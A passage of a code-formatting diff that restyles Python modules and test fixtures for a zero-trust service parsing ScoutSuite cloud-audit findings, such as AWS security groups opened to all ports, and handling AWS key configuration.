b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py index 4dce7ed2b..8ad561ece 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py @@ -1,35 +1,63 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - cloudformation_rule_path_creator import CloudformationRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - cloudtrail_rule_path_creator import CloudTrailRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - cloudwatch_rule_path_creator import CloudWatchRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - config_rule_path_creator import ConfigRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - ec2_rule_path_creator import EC2RulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - elb_rule_path_creator import ELBRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - elbv2_rule_path_creator import ELBv2RulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - iam_rule_path_creator import IAMRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - rds_rule_path_creator import RDSRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - redshift_rule_path_creator import RedshiftRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - s3_rule_path_creator import S3RulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - ses_rule_path_creator import SESRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - sns_rule_path_creator import SNSRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators. \ - sqs_rule_path_creator import SQSRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators. \ - vpc_rule_path_creator import VPCRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudformation_rule_path_creator import ( + CloudformationRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudtrail_rule_path_creator import ( + CloudTrailRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudwatch_rule_path_creator import ( + CloudWatchRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.config_rule_path_creator import ( + ConfigRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.ec2_rule_path_creator import ( + EC2RulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.elb_rule_path_creator import ( + ELBRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.elbv2_rule_path_creator import ( + ELBv2RulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.iam_rule_path_creator import ( + IAMRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.rds_rule_path_creator import ( + RDSRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.redshift_rule_path_creator import ( + RedshiftRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.s3_rule_path_creator import ( + S3RulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.ses_rule_path_creator import ( + SESRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.sns_rule_path_creator import ( + SNSRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.sqs_rule_path_creator import ( + SQSRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.vpc_rule_path_creator import ( + VPCRulePathCreator, +) -RULE_PATH_CREATORS_LIST = [EC2RulePathCreator, ELBv2RulePathCreator, RDSRulePathCreator, RedshiftRulePathCreator, - S3RulePathCreator, IAMRulePathCreator, CloudTrailRulePathCreator, ELBRulePathCreator, - VPCRulePathCreator, CloudWatchRulePathCreator, SQSRulePathCreator, SNSRulePathCreator, - SESRulePathCreator, ConfigRulePathCreator, CloudformationRulePathCreator] +RULE_PATH_CREATORS_LIST = [ + EC2RulePathCreator, + ELBv2RulePathCreator, + RDSRulePathCreator, + RedshiftRulePathCreator, + S3RulePathCreator, + IAMRulePathCreator, + CloudTrailRulePathCreator, + ELBRulePathCreator, + VPCRulePathCreator, + CloudWatchRulePathCreator, + SQSRulePathCreator, + SNSRulePathCreator, + SESRulePathCreator, + ConfigRulePathCreator, + CloudformationRulePathCreator, +] diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py index afe14c54c..15a0b4b11 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py @@ -10,21 +10,29 @@ from monkey_island.cc.services.zero_trust.test_common.raw_scoutsute_data import class ExampleRules(Enum): - NON_EXSISTENT_RULE = 'bogus_rule' + NON_EXSISTENT_RULE = "bogus_rule" ALL_PORTS_OPEN = EC2Rules.SECURITY_GROUP_ALL_PORTS_TO_ALL -EXPECTED_RESULT = {'description': 'Security Group Opens All Ports to All', - 'path': 'ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR', - 'level': 'danger', - 'display_path': 'ec2.regions.id.vpcs.id.security_groups.id', - 'items': [ - 'ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups.' - 'sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR'], - 'dashboard_name': 'Rules', 'checked_items': 179, 'flagged_items': 2, 'service': 'EC2', - 'rationale': 'It was detected that all ports in the security group are open <...>', - 'remediation': None, 'compliance': None, 'references': None} +EXPECTED_RESULT = { + "description": "Security Group Opens All Ports to All", + "path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR", + "level": "danger", + "display_path": "ec2.regions.id.vpcs.id.security_groups.id", + "items": [ + "ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups." + "sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR" + ], + "dashboard_name": "Rules", + "checked_items": 179, + "flagged_items": 2, + "service": "EC2", + "rationale": "It was detected that all ports in the security group are open <...>", + "remediation": None, + "compliance": None, + "references": None, +} def test_get_rule_data(): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py index 1f0ee180e..05bcebd03 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py @@ -15,24 +15,28 @@ def is_cloud_authentication_setup(provider: CloudProviders) -> Tuple[bool, str]: return True, "AWS keys already setup." import ScoutSuite.providers.aws.authentication_strategy as auth_strategy + try: profile = auth_strategy.AWSAuthenticationStrategy().authenticate() - return True, f" Profile \"{profile.session.profile_name}\" is already setup. " + return True, f' Profile "{profile.session.profile_name}" is already setup. ' except AuthenticationException: return False, "" def is_aws_keys_setup(): - return (ConfigService.get_config_value(AWS_KEYS_PATH + ['aws_access_key_id']) and - ConfigService.get_config_value(AWS_KEYS_PATH + ['aws_secret_access_key'])) + return ConfigService.get_config_value( + AWS_KEYS_PATH + ["aws_access_key_id"] + ) and ConfigService.get_config_value(AWS_KEYS_PATH + ["aws_secret_access_key"]) def set_aws_keys(access_key_id: str, secret_access_key: str, session_token: str): if not access_key_id or not secret_access_key: - raise InvalidAWSKeys("Missing some of the following fields: access key ID, secret access key.") - _set_aws_key('aws_access_key_id', access_key_id) - _set_aws_key('aws_secret_access_key', secret_access_key) - _set_aws_key('aws_session_token', session_token) + raise InvalidAWSKeys( + "Missing some of the following fields: access key ID, secret access key." + ) + _set_aws_key("aws_access_key_id", access_key_id) + _set_aws_key("aws_secret_access_key", secret_access_key) + _set_aws_key("aws_session_token", session_token) def _set_aws_key(key_type: str, key_value: str): @@ -42,9 +46,11 @@ def _set_aws_key(key_type: str, key_value: str): def get_aws_keys(): - return {'access_key_id': _get_aws_key('aws_access_key_id'), - 'secret_access_key': _get_aws_key('aws_secret_access_key'), - 'session_token': _get_aws_key('aws_session_token')} + return { + "access_key_id": _get_aws_key("aws_access_key_id"), + "secret_access_key": _get_aws_key("aws_secret_access_key"), + "session_token": _get_aws_key("aws_session_token"), + } def _get_aws_key(key_type: str): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py index 3b76194af..a97a1a2c8 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py @@ -3,22 +3,21 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts import rule_consts class ScoutSuiteRuleService: - @staticmethod def get_rule_from_rule_data(rule_data: dict) -> ScoutSuiteRule: rule = ScoutSuiteRule() - rule.description = rule_data['description'] - rule.path = rule_data['path'] - rule.level = rule_data['level'] - rule.items = rule_data['items'] - rule.dashboard_name = rule_data['dashboard_name'] - rule.checked_items = rule_data['checked_items'] - rule.flagged_items = rule_data['flagged_items'] - rule.service = rule_data['service'] - rule.rationale = rule_data['rationale'] - rule.remediation = rule_data['remediation'] - rule.compliance = rule_data['compliance'] - rule.references = rule_data['references'] + rule.description = rule_data["description"] + rule.path = rule_data["path"] + rule.level = rule_data["level"] + rule.items = rule_data["items"] + rule.dashboard_name = rule_data["dashboard_name"] + rule.checked_items = rule_data["checked_items"] + rule.flagged_items = rule_data["flagged_items"] + rule.service = rule_data["service"] + rule.rationale = rule_data["rationale"] + rule.remediation = rule_data["remediation"] + rule.compliance = rule_data["compliance"] + rule.references = rule_data["references"] return rule @staticmethod diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py index 63befc808..3d0cf8413 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py @@ -4,16 +4,21 @@ from common.common_consts import zero_trust_consts from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding from monkey_island.cc.models.zero_trust.scoutsuite_finding_details import ScoutSuiteFindingDetails from monkey_island.cc.models.zero_trust.scoutsuite_rule import ScoutSuiteRule -from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import ScoutSuiteFindingMap -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ScoutSuiteRuleService +from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import ( + ScoutSuiteFindingMap, +) +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ( + ScoutSuiteRuleService, +) class ScoutSuiteZTFindingService: - @staticmethod def process_rule(finding: ScoutSuiteFindingMap, rule: ScoutSuiteRule): existing_findings = ScoutSuiteFinding.objects(test=finding.test) - assert (len(existing_findings) < 2), "More than one finding exists for {}".format(finding.test) + assert len(existing_findings) < 2, "More than one finding exists for {}".format( + finding.test + ) if len(existing_findings) == 0: ScoutSuiteZTFindingService._create_new_finding_from_rule(finding, rule) @@ -49,17 +54,28 @@ class ScoutSuiteZTFindingService: def change_finding_status_by_rule(finding: ScoutSuiteFinding, rule: ScoutSuiteRule): rule_status = ScoutSuiteZTFindingService.get_finding_status_from_rules([rule]) finding_status = finding.status - new_finding_status = ScoutSuiteZTFindingService.get_finding_status_from_rule_status(finding_status, rule_status) + new_finding_status = ScoutSuiteZTFindingService.get_finding_status_from_rule_status( + finding_status, rule_status + ) if finding_status != new_finding_status: finding.status = new_finding_status @staticmethod def get_finding_status_from_rule_status(finding_status: str, rule_status: str) -> str: - if finding_status == zero_trust_consts.STATUS_FAILED or rule_status == zero_trust_consts.STATUS_FAILED: + if ( + finding_status == zero_trust_consts.STATUS_FAILED + or rule_status == zero_trust_consts.STATUS_FAILED + ): return zero_trust_consts.STATUS_FAILED - elif finding_status == zero_trust_consts.STATUS_VERIFY or rule_status == zero_trust_consts.STATUS_VERIFY: + elif ( + finding_status == zero_trust_consts.STATUS_VERIFY + or rule_status == zero_trust_consts.STATUS_VERIFY + ): return zero_trust_consts.STATUS_VERIFY - elif finding_status == zero_trust_consts.STATUS_PASSED or rule_status == zero_trust_consts.STATUS_PASSED: + elif ( + finding_status == zero_trust_consts.STATUS_PASSED + or rule_status == zero_trust_consts.STATUS_PASSED + ): return zero_trust_consts.STATUS_PASSED else: return zero_trust_consts.STATUS_UNEXECUTED diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py index 1ac9afdfe..5ffe194a4 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py @@ -7,7 +7,9 @@ from monkey_island.cc.database import mongo from monkey_island.cc.server_utils.encryptor import initialize_encryptor, get_encryptor from monkey_island.cc.services.config import ConfigService from common.config_value_paths import AWS_KEYS_PATH -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import is_aws_keys_setup +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import ( + is_aws_keys_setup, +) from monkey_island.cc.test_common.fixtures import FixtureEnum @@ -27,8 +29,12 @@ def test_is_aws_keys_setup(tmp_path): # Make sure noone changed config path and broke this function initialize_encryptor(tmp_path) - bogus_key_value = get_encryptor().enc('bogus_aws_key') - dpath.util.set(ConfigService.default_config, AWS_KEYS_PATH+['aws_secret_access_key'], bogus_key_value) - dpath.util.set(ConfigService.default_config, AWS_KEYS_PATH+['aws_access_key_id'], bogus_key_value) + bogus_key_value = get_encryptor().enc("bogus_aws_key") + dpath.util.set( + ConfigService.default_config, AWS_KEYS_PATH + ["aws_secret_access_key"], bogus_key_value + ) + dpath.util.set( + ConfigService.default_config, AWS_KEYS_PATH + ["aws_access_key_id"], bogus_key_value + ) assert is_aws_keys_setup() diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py index e08c8a290..32491b2c5 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py @@ -1,29 +1,34 @@ from copy import deepcopy -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_consts import RULE_LEVEL_WARNING, RULE_LEVEL_DANGER -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ScoutSuiteRuleService +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_consts import ( + RULE_LEVEL_WARNING, + RULE_LEVEL_DANGER, +) +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ( + ScoutSuiteRuleService, +) from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import RULES example_scoutsuite_data = { - 'checked_items': 179, - 'compliance': None, - 'dashboard_name': 'Rules', - 'description': 'Security Group Opens All Ports to All', - 'flagged_items': 2, - 'items': [ - 'ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72' - '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR', - 'ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65' - '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR' + "checked_items": 179, + "compliance": None, + "dashboard_name": "Rules", + "description": "Security Group Opens All Ports to All", + "flagged_items": 2, + "items": [ + "ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72" + ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR", + "ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65" + ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR", ], - 'level': 'danger', - 'path': 'ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR', - 'rationale': 'It was detected that all ports in the security group are open, and any source IP address' - ' could send traffic to these ports, which creates a wider attack surface for resources ' - 'assigned to it. Open ports should be reduced to the minimum needed to correctly', - 'references': [], - 'remediation': None, - 'service': 'EC2' + "level": "danger", + "path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR", + "rationale": "It was detected that all ports in the security group are open, and any source IP address" + " could send traffic to these ports, which creates a wider attack surface for resources " + "assigned to it. Open ports should be reduced to the minimum needed to correctly", + "references": [], + "remediation": None, + "service": "EC2", } diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py index 549d3161e..de7b5635e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py @@ -2,13 +2,17 @@ import pytest from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import ScoutSuiteZTFindingService -from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import RULES, SCOUTSUITE_FINDINGS +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import ( + ScoutSuiteZTFindingService, +) +from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import ( + RULES, + SCOUTSUITE_FINDINGS, +) from monkey_island.cc.test_common.fixtures import FixtureEnum class TestScoutSuiteZTFindingService: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_process_rule(self): # Creates new PermissiveFirewallRules finding with a rule diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py index aaea95031..5582bb83d 100644 --- a/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py +++ b/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py @@ -1,23 +1,31 @@ -from common.common_consts.zero_trust_consts import TEST_SCOUTSUITE_SERVICE_SECURITY, STATUS_FAILED, \ - TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED +from common.common_consts.zero_trust_consts import ( + TEST_SCOUTSUITE_SERVICE_SECURITY, + STATUS_FAILED, + TEST_ENDPOINT_SECURITY_EXISTS, + STATUS_PASSED, +) from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.monkey_finding import MonkeyFinding from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding -from monkey_island.cc.services.zero_trust.test_common.monkey_finding_data import get_monkey_details_dto -from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import get_scoutsuite_details_dto +from monkey_island.cc.services.zero_trust.test_common.monkey_finding_data import ( + get_monkey_details_dto, +) +from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import ( + get_scoutsuite_details_dto, +) def get_scoutsuite_finding_dto() -> Finding: scoutsuite_details = get_scoutsuite_details_dto() scoutsuite_details.save() - return ScoutSuiteFinding(test=TEST_SCOUTSUITE_SERVICE_SECURITY, - status=STATUS_FAILED, - details=scoutsuite_details) + return ScoutSuiteFinding( + test=TEST_SCOUTSUITE_SERVICE_SECURITY, status=STATUS_FAILED, details=scoutsuite_details + ) def get_monkey_finding_dto() -> Finding: monkey_details = get_monkey_details_dto() monkey_details.save() - return MonkeyFinding(test=TEST_ENDPOINT_SECURITY_EXISTS, - status=STATUS_PASSED, - details=monkey_details) + return MonkeyFinding( + test=TEST_ENDPOINT_SECURITY_EXISTS, status=STATUS_PASSED, details=monkey_details + ) diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py index b0050a8c9..0e5433784 100644 --- a/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py +++ b/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py @@ -6,21 +6,24 @@ EVENTS = [ "timestamp": "2021-01-20T15:40:28.357Z", "title": "Process list", "message": "Monkey on pc-24 scanned the process list", - "event_type": "monkey_local" + "event_type": "monkey_local", }, { "timestamp": "2021-01-20T16:08:29.519Z", "title": "Process list", "message": "", - "event_type": "monkey_local" + "event_type": "monkey_local", }, ] EVENTS_DTO = [ - Event(timestamp=event['timestamp'], - title=event['title'], - message=event['message'], - event_type=event['event_type']) for event in EVENTS + Event( + timestamp=event["timestamp"], + title=event["title"], + message=event["message"], + event_type=event["event_type"], + ) + for event in EVENTS ] DETAILS_DTO = [] diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py index 317697632..978209671 100644 --- a/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py +++ b/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py @@ -1,93 +1,168 @@ # This is what our codebase receives after running ScoutSuite module. # Object '...': {'...': '...'} represents continuation of similar objects as above RAW_SCOUTSUITE_DATA = { - 'sg_map': { - 'sg-abc': {'region': 'ap-northeast-1', 'vpc_id': 'vpc-abc'}, - 'sg-abcd': {'region': 'ap-northeast-2', 'vpc_id': 'vpc-abc'}, - '...': {'...': '...'}}, - 'subnet_map': { - 'subnet-abc': {'region': 'ap-northeast-1', 'vpc_id': 'vpc-abc'}, - 'subnet-abcd': {'region': 'ap-northeast-1', 'vpc_id': 'vpc-abc'}, - '...': {'...': '...'} + "sg_map": { + "sg-abc": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"}, + "sg-abcd": {"region": "ap-northeast-2", "vpc_id": "vpc-abc"}, + "...": {"...": "..."}, }, - 'provider_code': 'aws', - 'provider_name': 'Amazon Web Services', - 'environment': None, - 'result_format': 'json', - 'partition': 'aws', - 'account_id': '125686982355', - 'last_run': { - 'time': '2021-02-05 16:03:04+0200', - 'run_parameters': {'services': [], 'skipped_services': [], 'regions': [], 'excluded_regions': []}, - 'version': '5.10.0', - 'ruleset_name': 'default', - 'ruleset_about': 'This ruleset', - 'summary': {'ec2': {'checked_items': 3747, 'flagged_items': 262, 'max_level': 'warning', 'rules_count': 28, - 'resources_count': 176}, - 's3': {'checked_items': 88, 'flagged_items': 25, 'max_level': 'danger', 'rules_count': 18, - 'resources_count': 5}, - '...': {'...': '...'}}}, - 'metadata': { - 'compute': { - 'summaries': {'external attack surface': {'cols': 1, - 'path': 'service_groups.compute.summaries.external_attack_surface', - 'callbacks': [ - ['merge', {'attribute': 'external_attack_surface'}]]}}, - '...': {'...': '...'} + "subnet_map": { + "subnet-abc": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"}, + "subnet-abcd": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"}, + "...": {"...": "..."}, + }, + "provider_code": "aws", + "provider_name": "Amazon Web Services", + "environment": None, + "result_format": "json", + "partition": "aws", + "account_id": "125686982355", + "last_run": { + "time": "2021-02-05 16:03:04+0200", + "run_parameters": { + "services": [], + "skipped_services": [], + "regions": [], + "excluded_regions": [], + }, + "version": "5.10.0", + "ruleset_name": "default", + "ruleset_about": "This ruleset", + "summary": { + "ec2": { + "checked_items": 3747, + "flagged_items": 262, + "max_level": "warning", + "rules_count": 28, + "resources_count": 176, + }, + "s3": { + "checked_items": 88, + "flagged_items": 25, + "max_level": "danger", + "rules_count": 18, + "resources_count": 5, + }, + "...": {"...": "..."}, }, - '...': {'...': '...'} }, - + "metadata": { + "compute": { + "summaries": { + "external attack surface": { + "cols": 1, + "path": "service_groups.compute.summaries.external_attack_surface", + "callbacks": [["merge", {"attribute": "external_attack_surface"}]], + } + }, + "...": {"...": "..."}, + }, + "...": {"...": "..."}, + }, # This is the important part, which we parse to get resources - 'services': { - 'ec2': {'regions': { - 'ap-northeast-1': { - 'vpcs': { - 'vpc-abc': { - 'id': 'vpc-abc', - 'security_groups': { - 'sg-abc': { - 'name': 'default', - 'rules': { - 'ingress': {'protocols': { - 'ALL': {'ports': {'1-65535': {'cidrs': [{'CIDR': '0.0.0.0/0'}]}}}}, - 'count': 1}, - 'egress': {'protocols': { - 'ALL': {'ports': {'1-65535': {'cidrs': [{'CIDR': '0.0.0.0/0'}]}}}}, - 'count': 1}} - } - }}}, - '...': {'...': '...'} - }}, + "services": { + "ec2": { + "regions": { + "ap-northeast-1": { + "vpcs": { + "vpc-abc": { + "id": "vpc-abc", + "security_groups": { + "sg-abc": { + "name": "default", + "rules": { + "ingress": { + "protocols": { + "ALL": { + "ports": { + "1-65535": { + "cidrs": [{"CIDR": "0.0.0.0/0"}] + } + } + } + }, + "count": 1, + }, + "egress": { + "protocols": { + "ALL": { + "ports": { + "1-65535": { + "cidrs": [{"CIDR": "0.0.0.0/0"}] + } + } + } + }, + "count": 1, + }, + }, + } + }, + } + }, + "...": {"...": "..."}, + } + }, # Interesting info, maybe could be used somewhere in the report - 'external_attack_surface': { - '52.52.52.52': {'protocols': {'TCP': {'ports': {'22': {'cidrs': [{'CIDR': '0.0.0.0/0'}]}}}}, - 'InstanceName': 'InstanceName', - 'PublicDnsName': 'ec2-52-52-52-52.eu-central-1.compute.amazonaws.com'}}, + "external_attack_surface": { + "52.52.52.52": { + "protocols": {"TCP": {"ports": {"22": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}, + "InstanceName": "InstanceName", + "PublicDnsName": "ec2-52-52-52-52.eu-central-1.compute.amazonaws.com", + } + }, # We parse these into ScoutSuite security rules - 'findings': { - 'ec2-security-group-opens-all-ports-to-all': { - 'description': 'Security Group Opens All Ports to All', - 'path': 'ec2.regions.id.vpcs.id.security_groups' - '.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR', - 'level': 'danger', - 'display_path': 'ec2.regions.id.vpcs.id.security_groups.id', - 'items': [ - 'ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups' - '.sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR'], - 'dashboard_name': 'Rules', - 'checked_items': 179, - 'flagged_items': 2, - 'service': 'EC2', - 'rationale': 'It was detected that all ports in the security group are open <...>', - 'remediation': None, 'compliance': None, 'references': None}, - '...': {'...': '...'} - } + "findings": { + "ec2-security-group-opens-all-ports-to-all": { + "description": "Security Group Opens All Ports to All", + "path": "ec2.regions.id.vpcs.id.security_groups" + ".id.rules.id.protocols.id.ports.id.cidrs.id.CIDR", + "level": "danger", + "display_path": "ec2.regions.id.vpcs.id.security_groups.id", + "items": [ + "ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups" + ".sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR" + ], + "dashboard_name": "Rules", + "checked_items": 179, + "flagged_items": 2, + "service": "EC2", + "rationale": "It was detected that all ports in the security group are open <...>", + "remediation": None, + "compliance": None, + "references": None, + }, + "...": {"...": "..."}, + }, }, - '...': {'...': '...'} + "...": {"...": "..."}, }, - 'service_list': ['acm', 'awslambda', 'cloudformation', 'cloudtrail', 'cloudwatch', 'config', 'directconnect', - 'dynamodb', 'ec2', 'efs', 'elasticache', 'elb', 'elbv2', 'emr', 'iam', 'kms', 'rds', 'redshift', - 'route53', 's3', 'ses', 'sns', 'sqs', 'vpc', 'secretsmanager'], - 'service_groups': {'...': {'...': '...'}} + "service_list": [ + "acm", + "awslambda", + "cloudformation", + "cloudtrail", + "cloudwatch", + "config", + "directconnect", + "dynamodb", + "ec2", + "efs", + "elasticache", + "elb", + "elbv2", + "emr", + "iam", + "kms", + "rds", + "redshift", + 